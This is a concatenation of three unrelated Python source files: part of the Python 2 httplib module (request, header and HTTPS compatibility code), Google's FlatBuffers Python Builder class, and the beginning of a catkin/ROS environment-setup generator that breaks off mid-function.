if self._http_vsn == 11:
# Issue some standard headers for better HTTP/1.1 compliance
if not skip_host:
# this header is issued *only* for HTTP/1.1
# connections. more specifically, this means it is
# only issued when the client uses the new
# HTTPConnection() class. backwards-compat clients
# will be using HTTP/1.0 and those clients may be
# issuing this header themselves. we should NOT issue
# it twice; some web servers (such as Apache) barf
# when they see two Host: headers
# If we need a non-standard port,include it in the
# header. If the request is going through a proxy,
# but the host of the actual URL, not the host of the
# proxy.
netloc = ''
if url.startswith('http'):
nil, netloc, nil, nil, nil = urlsplit(url)
if netloc:
try:
netloc_enc = netloc.encode("ascii")
except UnicodeEncodeError:
netloc_enc = netloc.encode("idna")
self.putheader('Host', netloc_enc)
else:
try:
host_enc = self.host.encode("ascii")
except UnicodeEncodeError:
host_enc = self.host.encode("idna")
if self.port == self.default_port:
self.putheader('Host', host_enc)
else:
self.putheader('Host', "%s:%s" % (host_enc, self.port))
# note: we are assuming that clients will not attempt to set these
# headers since *this* library must deal with the
# consequences. this also means that when the supporting
# libraries are updated to recognize other forms, then this
# code should be changed (removed or updated).
# we only want a Content-Encoding of "identity" since we don't
# support encodings such as x-gzip or x-deflate.
if not skip_accept_encoding:
self.putheader('Accept-Encoding', 'identity')
# we can accept "chunked" Transfer-Encodings, but no others
# NOTE: no TE header implies *only* "chunked"
#self.putheader('TE', 'chunked')
# if TE is supplied in the header, then it must appear in a
# Connection header.
#self.putheader('Connection', 'TE')
else:
# For HTTP/1.0, the server will assume "not chunked"
pass
def putheader(self, header, value):
"""Send a request header line to the server.
For example: h.putheader('Accept', 'text/html')
"""
if self.__state != _CS_REQ_STARTED:
raise CannotSendHeader()
str = '%s: %s' % (header, value)
self._output(str)
def endheaders(self):
"""Indicate that the last header line has been sent to the server."""
if self.__state == _CS_REQ_STARTED:
self.__state = _CS_REQ_SENT
else:
raise CannotSendHeader()
self._send_output()
def request(self, method, url, body=None, headers={}):
"""Send a complete request to the server."""
try:
self._send_request(method, url, body, headers)
except socket.error, v:
# trap 'Broken pipe' if we're allowed to automatically reconnect
if v.args[0] != 32 or not self.auto_open:
raise
# try one more time
self._send_request(method, url, body, headers)
def _send_request(self, method, url, body, headers):
# honour explicitly requested Host: and Accept-Encoding headers
header_names = dict.fromkeys([k.lower() for k in headers])
skips = {}
if 'host' in header_names:
skips['skip_host'] = 1
if 'accept-encoding' in header_names:
skips['skip_accept_encoding'] = 1
self.putrequest(method, url, **skips)
if body and ('content-length' not in header_names):
thelen=None
try:
thelen=str(len(body))
except TypeError, te:
# If this is a file-like object, try to
# fstat its file descriptor
import os
try:
thelen = str(os.fstat(body.fileno()).st_size)
except (AttributeError, OSError):
# Don't send a length if this failed
if self.debuglevel > 0: print "Cannot stat!!"
if thelen is not None:
self.putheader('Content-Length',thelen)
for hdr, value in headers.iteritems():
self.putheader(hdr, value)
self.endheaders()
if body:
self.send(body)
def getresponse(self):
"Get the response from the server."
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
#
# if a prior response exists, then it must be completed (otherwise, we
# cannot read this response's header to determine the connection-close
# behavior)
#
# note: if a prior response existed, but was connection-close, then the
# socket and response were made independent of this HTTPConnection
# object since a new request requires that we open a whole new
# connection
#
# this means the prior response had one of two states:
# 1) will_close: this connection was reset and the prior socket and
# response operate independently
# 2) persistent: the response was retained and we await its
# isclosed() status to become true.
#
if self.__state != _CS_REQ_SENT or self.__response:
raise ResponseNotReady()
if self.debuglevel > 0:
response = self.response_class(self.sock, self.debuglevel,
strict=self.strict,
method=self._method)
else:
response = self.response_class(self.sock, strict=self.strict,
method=self._method)
response.begin()
assert response.will_close != _UNKNOWN
self.__state = _CS_IDLE
if response.will_close:
# this effectively passes the connection to the response
self.close()
else:
# remember this, so we can tell when it is complete
self.__response = response
return response
class HTTP:
"Compatibility class with httplib.py from 1.5."
_http_vsn = 10
_http_vsn_str = 'HTTP/1.0'
debuglevel = 0
_connection_class = HTTPConnection
def __init__(self, host='', port=None, strict=None):
"Provide a default host, since the superclass requires one."
# some joker passed 0 explicitly, meaning default port
if port == 0:
port = None
# Note that we may pass an empty string as the host; this will throw
# an error when we attempt to connect. Presumably, the client code
# will call connect before then, with a proper host.
self._setup(self._connection_class(host, port, strict))
def _setup(self, conn):
self._conn = conn
# set up delegation to flesh out interface
self.send = conn.send
self.putrequest = conn.putrequest
self.endheaders = conn.endheaders
self.set_debuglevel = conn.set_debuglevel
conn._http_vsn = self._http_vsn
conn._http_vsn_str = self._http_vsn_str
self.file = None
def connect(self, host=None, port=None):
"Accept arguments to set the host/port, since the superclass doesn't."
if host is not None:
self._conn._set_hostport(host, port)
self._conn.connect()
def getfile(self):
"Provide a getfile, since the superclass' does not use this concept."
return self.file
def putheader(self, header, *values):
"The superclass allows only one value argument."
self._conn.putheader(header, '\r\n\t'.join(values))
def getreply(self):
"""Compat definition since superclass does not define it.
Returns a tuple consisting of:
- server status code (e.g. '200' if all goes well)
- server "reason" corresponding to status code
- any RFC822 headers in the response from the server
"""
try:
response = self._conn.getresponse()
except BadStatusLine, e:
### hmm. if getresponse() ever closes the socket on a bad request,
### then we are going to have problems with self.sock
### should we keep this behavior? do people use it?
# keep the socket open (as a file), and return it
self.file = self._conn.sock.makefile('rb', 0)
# close our socket -- we want to restart after any protocol error
self.close()
self.headers = None
return -1, e.line, None
self.headers = response.msg
self.file = response.fp
return response.status, response.reason, response.msg
def close(self):
self._conn.close()
# note that self.file == response.fp, which gets closed by the
# superclass. just clear the object ref here.
### hmm. messy. if status==-1, then self.file is owned by us.
### well... we aren't explicitly closing, but losing this ref will
### do it
self.file = None
try:
import ssl
except ImportError:
pass
else:
class HTTPSConnection(HTTPConnection):
"This class allows communication via SSL."
default_port = HTTPS_PORT
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
HTTPConnection.__init__(self, host, port, strict, timeout)
self.key_file = key_file
self.cert_file = cert_file
def connect(self):
"Connect to a host on a given (SSL) port."
sock = socket.create_connection((self.host, self.port), self.timeout)
if self._tunnel_host:
self.sock = sock
self._tunnel()
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)
__all__.append("HTTPSConnection")
class HTTPS(HTTP):
"""Compatibility with 1.5 httplib interface
Python 1.5.2 did not have an HTTPS class, but it defined an
interface for sending http requests that is also useful for
https.
"""
_connection_class = HTTPSConnection
def __init__(self, host='', port=None, key_file=None, cert_file=None,
strict=None):
# provide a default host, pass the X509 cert info
# urf. compensate for bad input.
if port == 0:
port = None
self._setup(self._connection_class(host, port, key_file,
cert_file, strict))
# we never actually use these for anything, but we keep them
# here for compatibility with post-1.5.2 CVS.
self.key_file = key_file
self.cert_file = cert_file
def FakeSocket (sock, sslobj):
warnings.warn("FakeSocket is deprecated, and won't be in 3.x. " +
"Use the result of ssl.wrap_socket() directly instead.",
DeprecationWarning, stacklevel=2)
return sslobj
class HTTPException(Exception):
# Subclasses that define an __init__ must call Exception.__init__
# or define self.args. Otherwise, str() will fail.
pass
class NotConnected(HTTPException):
pass
class InvalidURL(HTTPException):
pass
class UnknownProtocol(HTTPException):
def __init__(self, version):
self.args = version,
self.version = version
class UnknownTransferEncoding(HTTPException):
pass
class UnimplementedFileMode(HTTPException):
pass
class IncompleteRead(HTTPException):
def __init__(self, partial, expected=None):
self.args = partial,
self.partial = partial
self.expected = expected
def __repr__(self):
if self.expected is not None:
e = ', %i more expected' % self.expected
else:
e = ''
return 'IncompleteRead(%i bytes read%s)' % (len(self.partial), e)
def __str__(self):
return repr(self)
class ImproperConnectionState(HTTPException):
pass
class CannotSendRequest(ImproperConnectionState):
pass
class CannotSendHeader(ImproperConnectionState):
pass
class ResponseNotReady(ImproperConnectionState):
pass
class BadStatusLine(HTTPException):
def __init__(self, line):
self.args = line,
self.line = line
# for backwards compatibility
error = HTTPException
class LineAndFileWrapper:
"""A limited file-like object for HTTP/0.9 responses."""
# The status-line parsing code calls readline(), which normally
# get the HTTP status line. For a 0.9 response, however, this is
# actually the first line of the body! Clients need to get a
# readable file object that contains that line.
def __init__(self, line, file):
self._line = line
self._file = file
self._line_consumed = 0
self._line_offset = 0
self._line_left = len(line)
def __getattr__(self, attr):
return getattr(self._file, attr)
def _done(self):
# called when the last byte is read from the line. After the
# call, all read methods are delegated to the underlying file
# object.
self._line_consumed = 1
self.read = self._file.read
self.readline = self._file.readline
self.readlines = self._file.readlines
def read(self, amt=None):
if self._line_consumed:
return self._file.read(amt)
assert self._line_left
if amt is None or amt > self._line_left:
s = self._line[self._line_offset:]
self._done()
if amt is None:
return s + self._file.read()
else:
return s + self._file.read(amt - len(s))
else:
assert amt <= self._line_left
i = self._line_offset
j = i + amt
s = self._line[i:j]
self._line_offset = j
self._line_left -= amt
if self._line_left == 0:
self._done()
return s
def readline(self):
if self._line_consumed:
return self._file.readline()
assert self._line_left
s = self._line[self._line_offset:]
self._done()
return s
def readlines(self, size=None):
if self._line_consumed:
return self._file.readlines(size)
assert self._line_left
L = [self._line[self._line_offset:]]
self._done()
if size is None:
return L + self._file.readlines()
else:
return L + self._file.readlines(size)
def test():
"""Test this module.
A hodge podge of tests collected here, because they have too many
external dependencies for the regular test suite.
"""
import sys
import getopt
opts, args = getopt.getopt(sys.argv[1:], 'd')
dl = 0
for o, a in opts:
if o == '-d': dl = dl + 1
host = 'www.python.org'
selector = '/'
if args[0:]: host = args[0]
if args[1:]: selector = args[1]
h = HTTP()
h.set_debuglevel(dl)
h.connect(host)
h.putrequest('GET', selector)
h.endheaders()
status, reason, headers = h.getreply()
print 'status =', status
print 'reason =', reason
print "read", len(h.getfile().read())
print
if headers:
for header in headers.headers: print header.strip()
print
# minimal test that code to extract host from url works
class HTTP11(HTTP):
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
h = HTTP11('www.python.org')
h.putrequest('GET', 'http://www.python.org/~jeremy/')
h.endheaders()
h.getreply()
h.close()
try:
import ssl
except ImportError:
pass
else:
for host, selector in (('sourceforge.net', '/projects/python'),
):
print "https://%s%s" % (host, selector)
hs = HTTPS()
hs.set_debuglevel(dl)
hs.connect(host)
hs.putrequest('GET', selector)
hs.endheaders()
status, reason, headers = hs.getreply()
print 'status =', status
print 'reason =', reason
print "read", len(hs.getfile().read())
print
if headers:
for header in headers.headers: print header.strip()
print
if __name__ == '__main__':
test()
| |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import number_types as N
from .number_types import (UOffsetTFlags, SOffsetTFlags, VOffsetTFlags)
from . import encode
from . import packer
from . import compat
from .compat import range_func
from .compat import memoryview_type
## @file
## @addtogroup flatbuffers_python_api
## @{
## @cond FLATBUFFERS_INTERNAL
class OffsetArithmeticError(RuntimeError):
"""
Error caused by an Offset arithmetic error. Probably caused by bad
writing of fields. This is considered an unreachable situation in
normal circumstances.
"""
pass
class IsNotNestedError(RuntimeError):
"""
Error caused by using a Builder to write Object data when not inside
an Object.
"""
pass
class IsNestedError(RuntimeError):
"""
Error caused by using a Builder to begin an Object when an Object is
already being built.
"""
pass
class StructIsNotInlineError(RuntimeError):
"""
Error caused by using a Builder to write a Struct at a location that
is not the current Offset.
"""
pass
class BuilderSizeError(RuntimeError):
"""
Error caused by causing a Builder to exceed the hardcoded limit of 2
gigabytes.
"""
pass
class BuilderNotFinishedError(RuntimeError):
"""
Error caused by not calling `Finish` before calling `Output`.
"""
pass
# VtableMetadataFields is the count of metadata fields in each vtable.
VtableMetadataFields = 2
## @endcond
class Builder(object):
""" A Builder is used to construct one or more FlatBuffers.
Typically, Builder objects will be used from code generated by the `flatc`
compiler.
A Builder constructs byte buffers in a last-first manner for simplicity and
performance during reading.
Internally, a Builder is a state machine for creating FlatBuffer objects.
It holds the following internal state:
- Bytes: an array of bytes.
- current_vtable: a list of integers.
- vtables: a list of vtable entries (i.e. a list of list of integers).
Attributes:
Bytes: The internal `bytearray` for the Builder.
finished: A boolean determining if the Builder has been finalized.
"""
## @cond FLATBUFFERS_INTENRAL
__slots__ = ("Bytes", "current_vtable", "head", "minalign", "objectEnd",
"vtables", "nested", "finished")
"""Maximum buffer size constant, in bytes.
Builder will never allow it's buffer grow over this size.
Currently equals 2Gb.
"""
MAX_BUFFER_SIZE = 2**31
## @endcond
def __init__(self, initialSize):
"""Initializes a Builder of size `initial_size`.
The internal buffer is grown as needed.
"""
if not (0 <= initialSize <= Builder.MAX_BUFFER_SIZE):
msg = "flatbuffers: Cannot create Builder larger than 2 gigabytes."
raise BuilderSizeError(msg)
self.Bytes = bytearray(initialSize)
## @cond FLATBUFFERS_INTERNAL
self.current_vtable = None
self.head = UOffsetTFlags.py_type(initialSize)
self.minalign = 1
self.objectEnd = None
self.vtables = []
self.nested = False
## @endcond
self.finished = False
def Output(self):
"""Return the portion of the buffer that has been used for writing data.
This is the typical way to access the FlatBuffer data inside the
builder. If you try to access `Builder.Bytes` directly, you would need
to manually index it with `Head()`, since the buffer is constructed
backwards.
It raises BuilderNotFinishedError if the buffer has not been finished
with `Finish`.
"""
if not self.finished:
raise BuilderNotFinishedError()
return self.Bytes[self.Head():]
## @cond FLATBUFFERS_INTERNAL
def StartObject(self, numfields):
"""StartObject initializes bookkeeping for writing a new object."""
self.assertNotNested()
# use 32-bit offsets so that arithmetic doesn't overflow.
self.current_vtable = [0 for _ in range_func(numfields)]
self.objectEnd = self.Offset()
self.minalign = 1
self.nested = True
def WriteVtable(self):
"""
WriteVtable serializes the vtable for the current object, if needed.
Before writing out the vtable, this checks pre-existing vtables for
equality to this one. If an equal vtable is found, point the object to
the existing vtable and return.
Because vtable values are sensitive to alignment of object data, not
all logically-equal vtables will be deduplicated.
A vtable has the following format:
<VOffsetT: size of the vtable in bytes, including this value>
<VOffsetT: size of the object in bytes, including the vtable offset>
<VOffsetT: offset for a field> * N, where N is the number of fields
in the schema for this type. Includes deprecated fields.
Thus, a vtable is made of 2 + N elements, each VOffsetT bytes wide.
An object has the following format:
<SOffsetT: offset to this object's vtable (may be negative)>
<byte: data>+
"""
# Prepend a zero scalar to the object. Later in this function we'll
# write an offset here that points to the object's vtable:
self.PrependSOffsetTRelative(0)
objectOffset = self.Offset()
existingVtable = None
# Trim trailing 0 offsets.
while self.current_vtable and self.current_vtable[-1] == 0:
self.current_vtable.pop()
# Search backwards through existing vtables, because similar vtables
# are likely to have been recently appended. See
# BenchmarkVtableDeduplication for a case in which this heuristic
# saves about 30% of the time used in writing objects with duplicate
# tables.
i = len(self.vtables) - 1
while i >= 0:
# Find the other vtable, which is associated with `i`:
vt2Offset = self.vtables[i]
vt2Start = len(self.Bytes) - vt2Offset
vt2Len = encode.Get(packer.voffset, self.Bytes, vt2Start)
metadata = VtableMetadataFields * N.VOffsetTFlags.bytewidth
vt2End = vt2Start + vt2Len
vt2 = self.Bytes[vt2Start+metadata:vt2End]
# Compare the other vtable to the one under consideration.
# If they are equal, store the offset and break:
if vtableEqual(self.current_vtable, objectOffset, vt2):
existingVtable = vt2Offset
break
i -= 1
if existingVtable is None:
# Did not find a vtable, so write this one to the buffer.
# Write out the current vtable in reverse , because
# serialization occurs in last-first order:
i = len(self.current_vtable) - 1
while i >= 0:
off = 0
if self.current_vtable[i] != 0:
# Forward reference to field;
# use 32bit number to ensure no overflow:
off = objectOffset - self.current_vtable[i]
self.PrependVOffsetT(off)
i -= 1
# The two metadata fields are written last.
# First, store the object bytesize:
objectSize = UOffsetTFlags.py_type(objectOffset - self.objectEnd)
self.PrependVOffsetT(VOffsetTFlags.py_type(objectSize))
# Second, store the vtable bytesize:
vBytes = len(self.current_vtable) + VtableMetadataFields
vBytes *= N.VOffsetTFlags.bytewidth
self.PrependVOffsetT(VOffsetTFlags.py_type(vBytes))
# Next, write the offset to the new vtable in the
# already-allocated SOffsetT at the beginning of this object:
objectStart = SOffsetTFlags.py_type(len(self.Bytes) - objectOffset)
encode.Write(packer.soffset, self.Bytes, objectStart,
SOffsetTFlags.py_type(self.Offset() - objectOffset))
# Finally, store this vtable in memory for future
# deduplication:
self.vtables.append(self.Offset())
else:
# Found a duplicate vtable.
objectStart = SOffsetTFlags.py_type(len(self.Bytes) - objectOffset)
self.head = UOffsetTFlags.py_type(objectStart)
# Write the offset to the found vtable in the
# already-allocated SOffsetT at the beginning of this object:
encode.Write(packer.soffset, self.Bytes, self.Head(),
SOffsetTFlags.py_type(existingVtable - objectOffset))
self.current_vtable = None
return objectOffset
def EndObject(self):
"""EndObject writes data necessary to finish object construction."""
self.assertNested()
self.nested = False
return self.WriteVtable()
def growByteBuffer(self):
"""Doubles the size of the byteslice, and copies the old data towards
the end of the new buffer (since we build the buffer backwards)."""
if len(self.Bytes) == Builder.MAX_BUFFER_SIZE:
msg = "flatbuffers: cannot grow buffer beyond 2 gigabytes"
raise BuilderSizeError(msg)
newSize = min(len(self.Bytes) * 2, Builder.MAX_BUFFER_SIZE)
if newSize == 0:
newSize = 1
bytes2 = bytearray(newSize)
bytes2[newSize-len(self.Bytes):] = self.Bytes
self.Bytes = bytes2
## @endcond
def Head(self):
"""Get the start of useful data in the underlying byte buffer.
Note: unlike other functions, this value is interpreted as from the
left.
"""
## @cond FLATBUFFERS_INTERNAL
return self.head
## @endcond
## @cond FLATBUFFERS_INTERNAL
def Offset(self):
"""Offset relative to the end of the buffer."""
return UOffsetTFlags.py_type(len(self.Bytes) - self.Head())
def Pad(self, n):
"""Pad places zeros at the current offset."""
for i in range_func(n):
self.Place(0, N.Uint8Flags)
def Prep(self, size, additionalBytes):
"""
Prep prepares to write an element of `size` after `additional_bytes`
have been written, e.g. if you write a string, you need to align
such the int length field is aligned to SizeInt32, and the string
data follows it directly.
If all you need to do is align, `additionalBytes` will be 0.
"""
# Track the biggest thing we've ever aligned to.
if size > self.minalign:
self.minalign = size
# Find the amount of alignment needed such that `size` is properly
# aligned after `additionalBytes`:
alignSize = (~(len(self.Bytes) - self.Head() + additionalBytes)) + 1
alignSize &= (size - 1)
# Reallocate the buffer if needed:
while self.Head() < alignSize+size+additionalBytes:
oldBufSize = len(self.Bytes)
self.growByteBuffer()
updated_head = self.head + len(self.Bytes) - oldBufSize
self.head = UOffsetTFlags.py_type(updated_head)
self.Pad(alignSize)
def PrependSOffsetTRelative(self, off):
"""
PrependSOffsetTRelative prepends an SOffsetT, relative to where it
will be written.
"""
# Ensure alignment is already done:
self.Prep(N.SOffsetTFlags.bytewidth, 0)
if not (off <= self.Offset()):
msg = "flatbuffers: Offset arithmetic error."
raise OffsetArithmeticError(msg)
off2 = self.Offset() - off + N.SOffsetTFlags.bytewidth
self.PlaceSOffsetT(off2)
## @endcond
def PrependUOffsetTRelative(self, off):
"""Prepends an unsigned offset into vector data, relative to where it
will be written.
"""
# Ensure alignment is already done:
self.Prep(N.UOffsetTFlags.bytewidth, 0)
if not (off <= self.Offset()):
msg = "flatbuffers: Offset arithmetic error."
raise OffsetArithmeticError(msg)
off2 = self.Offset() - off + N.UOffsetTFlags.bytewidth
self.PlaceUOffsetT(off2)
## @cond FLATBUFFERS_INTERNAL
def StartVector(self, elemSize, numElems, alignment):
"""
StartVector initializes bookkeeping for writing a new vector.
A vector has the following format:
- <UOffsetT: number of elements in this vector>
- <T: data>+, where T is the type of elements of this vector.
"""
self.assertNotNested()
self.nested = True
self.Prep(N.Uint32Flags.bytewidth, elemSize*numElems)
self.Prep(alignment, elemSize*numElems) # In case alignment > int.
return self.Offset()
## @endcond
def EndVector(self, vectorNumElems):
"""EndVector writes data necessary to finish vector construction."""
self.assertNested()
## @cond FLATBUFFERS_INTERNAL
self.nested = False
## @endcond
# we already made space for this, so write without PrependUint32
self.PlaceUOffsetT(vectorNumElems)
return self.Offset()
def CreateString(self, s, encoding='utf-8', errors='strict'):
"""CreateString writes a null-terminated byte string as a vector."""
self.assertNotNested()
## @cond FLATBUFFERS_INTERNAL
self.nested = True
## @endcond
if isinstance(s, compat.string_types):
x = s.encode(encoding, errors)
elif isinstance(s, compat.binary_types):
x = s
else:
raise TypeError("non-string passed to CreateString")
self.Prep(N.UOffsetTFlags.bytewidth, (len(x)+1)*N.Uint8Flags.bytewidth)
self.Place(0, N.Uint8Flags)
l = UOffsetTFlags.py_type(len(s))
## @cond FLATBUFFERS_INTERNAL
self.head = UOffsetTFlags.py_type(self.Head() - l)
## @endcond
self.Bytes[self.Head():self.Head()+l] = x
return self.EndVector(len(x))
## @cond FLATBUFFERS_INTERNAL
def assertNested(self):
"""
Check that we are in the process of building an object.
"""
if not self.nested:
raise IsNotNestedError()
def assertNotNested(self):
"""
Check that no other objects are being built while making this
object. If not, raise an exception.
"""
if self.nested:
raise IsNestedError()
def assertStructIsInline(self, obj):
"""
Structs are always stored inline, so need to be created right
where they are used. You'll get this error if you created it
elsewhere.
"""
N.enforce_number(obj, N.UOffsetTFlags)
if obj != self.Offset():
msg = ("flatbuffers: Tried to write a Struct at an Offset that "
"is different from the current Offset of the Builder.")
raise StructIsNotInlineError(msg)
def Slot(self, slotnum):
"""
Slot sets the vtable key `voffset` to the current location in the
buffer.
"""
self.assertNested()
self.current_vtable[slotnum] = self.Offset()
## @endcond
def Finish(self, rootTable):
"""Finish finalizes a buffer, pointing to the given `rootTable`."""
N.enforce_number(rootTable, N.UOffsetTFlags)
self.Prep(self.minalign, N.UOffsetTFlags.bytewidth)
self.PrependUOffsetTRelative(rootTable)
self.finished = True
return self.Head()
## @cond FLATBUFFERS_INTERNAL
def Prepend(self, flags, off):
self.Prep(flags.bytewidth, 0)
self.Place(off, flags)
def PrependSlot(self, flags, o, x, d):
N.enforce_number(x, flags)
N.enforce_number(d, flags)
if x != d:
self.Prepend(flags, x)
self.Slot(o)
def PrependBoolSlot(self, *args): self.PrependSlot(N.BoolFlags, *args)
def PrependByteSlot(self, *args): self.PrependSlot(N.Uint8Flags, *args)
def PrependUint8Slot(self, *args): self.PrependSlot(N.Uint8Flags, *args)
def PrependUint16Slot(self, *args): self.PrependSlot(N.Uint16Flags, *args)
def PrependUint32Slot(self, *args): self.PrependSlot(N.Uint32Flags, *args)
def PrependUint64Slot(self, *args): self.PrependSlot(N.Uint64Flags, *args)
def PrependInt8Slot(self, *args): self.PrependSlot(N.Int8Flags, *args)
def PrependInt16Slot(self, *args): self.PrependSlot(N.Int16Flags, *args)
def PrependInt32Slot(self, *args): self.PrependSlot(N.Int32Flags, *args)
def PrependInt64Slot(self, *args): self.PrependSlot(N.Int64Flags, *args)
def PrependFloat32Slot(self, *args): self.PrependSlot(N.Float32Flags,
*args)
def PrependFloat64Slot(self, *args): self.PrependSlot(N.Float64Flags,
*args)
def PrependUOffsetTRelativeSlot(self, o, x, d):
"""
PrependUOffsetTRelativeSlot prepends an UOffsetT onto the object at
vtable slot `o`. If value `x` equals default `d`, then the slot will
be set to zero and no other data will be written.
"""
if x != d:
self.PrependUOffsetTRelative(x)
self.Slot(o)
def PrependStructSlot(self, v, x, d):
"""
PrependStructSlot prepends a struct onto the object at vtable slot `o`.
Structs are stored inline, so nothing additional is being added.
In generated code, `d` is always 0.
"""
N.enforce_number(d, N.UOffsetTFlags)
if x != d:
self.assertStructIsInline(x)
self.Slot(v)
## @endcond
def PrependBool(self, x):
"""Prepend a `bool` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.BoolFlags, x)
def PrependByte(self, x):
"""Prepend a `byte` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Uint8Flags, x)
def PrependUint8(self, x):
"""Prepend an `uint8` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Uint8Flags, x)
def PrependUint16(self, x):
"""Prepend an `uint16` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Uint16Flags, x)
def PrependUint32(self, x):
"""Prepend an `uint32` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Uint32Flags, x)
def PrependUint64(self, x):
"""Prepend an `uint64` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Uint64Flags, x)
def PrependInt8(self, x):
"""Prepend an `int8` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Int8Flags, x)
def PrependInt16(self, x):
"""Prepend an `int16` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Int16Flags, x)
def PrependInt32(self, x):
"""Prepend an `int32` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Int32Flags, x)
def PrependInt64(self, x):
"""Prepend an `int64` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Int64Flags, x)
def PrependFloat32(self, x):
"""Prepend a `float32` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Float32Flags, x)
def PrependFloat64(self, x):
"""Prepend a `float64` to the Builder buffer.
Note: aligns and checks for space.
"""
self.Prepend(N.Float64Flags, x)
##############################################################
## @cond FLATBUFFERS_INTERNAL
def PrependVOffsetT(self, x): self.Prepend(N.VOffsetTFlags, x)
def Place(self, x, flags):
"""
Place prepends a value specified by `flags` to the Builder,
without checking for available space.
"""
N.enforce_number(x, flags)
self.head = self.head - flags.bytewidth
encode.Write(flags.packer_type, self.Bytes, self.Head(), x)
def PlaceVOffsetT(self, x):
"""PlaceVOffsetT prepends a VOffsetT to the Builder, without checking
for space.
"""
N.enforce_number(x, N.VOffsetTFlags)
self.head = self.head - N.VOffsetTFlags.bytewidth
encode.Write(packer.voffset, self.Bytes, self.Head(), x)
def PlaceSOffsetT(self, x):
"""PlaceSOffsetT prepends a SOffsetT to the Builder, without checking
for space.
"""
N.enforce_number(x, N.SOffsetTFlags)
self.head = self.head - N.SOffsetTFlags.bytewidth
encode.Write(packer.soffset, self.Bytes, self.Head(), x)
def PlaceUOffsetT(self, x):
"""PlaceUOffsetT prepends a UOffsetT to the Builder, without checking
for space.
"""
N.enforce_number(x, N.UOffsetTFlags)
self.head = self.head - N.UOffsetTFlags.bytewidth
encode.Write(packer.uoffset, self.Bytes, self.Head(), x)
## @endcond
## @cond FLATBUFFERS_INTERNAL
def vtableEqual(a, objectStart, b):
"""vtableEqual compares an unwritten vtable to a written vtable."""
N.enforce_number(objectStart, N.UOffsetTFlags)
if len(a) * N.VOffsetTFlags.bytewidth != len(b):
return False
for i, elem in enumerate(a):
x = encode.Get(packer.voffset, b, i * N.VOffsetTFlags.bytewidth)
# Skip vtable entries that indicate a default value.
if x == 0 and elem == 0:
pass
else:
y = objectStart - elem
if x != y:
return False
return True
## @endcond
## @}
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
'''This file generates shell code for the setup.SHELL scripts to set environment variables'''
from __future__ import print_function
import argparse
import copy
import errno
import os
import platform
import sys
CATKIN_MARKER_FILE = '.catkin'
system = platform.system()
IS_DARWIN = (system == 'Darwin')
IS_WINDOWS = (system == 'Windows')
# subfolder of workspace prepended to CMAKE_PREFIX_PATH
ENV_VAR_SUBFOLDERS = {
'CMAKE_PREFIX_PATH': '',
'CPATH': 'include',
'LD_LIBRARY_PATH' if not IS_DARWIN else 'DYLD_LIBRARY_PATH': ['lib', os.path.join('lib', 'x86_64-linux-gnu')],
'PATH': 'bin',
'PKG_CONFIG_PATH': [os.path.join('lib', 'pkgconfig'), os.path.join('lib', 'x86_64-linux-gnu', 'pkgconfig')],
'PYTHONPATH': 'lib/python2.7/dist-packages',
}
def rollback_env_variables(environ, env_var_subfolders):
'''
Generate shell code to reset environment variables
by unrolling modifications based on all workspaces in CMAKE_PREFIX_PATH.
This does not cover modifications performed by environment hooks.
'''
lines = []
unmodified_environ = copy.copy(environ)
for key in sorted(env_var_subfolders.keys()):
subfolders = env_var_subfolders[key]
if not isinstance(subfolders, list):
subfolders = [subfolders]
for subfolder in subfolders:
value = _rollback_env_variable(unmodified_environ, key, subfolder)
if value is not None:
environ[key] = value
lines.append(assignment(key, value))
if lines:
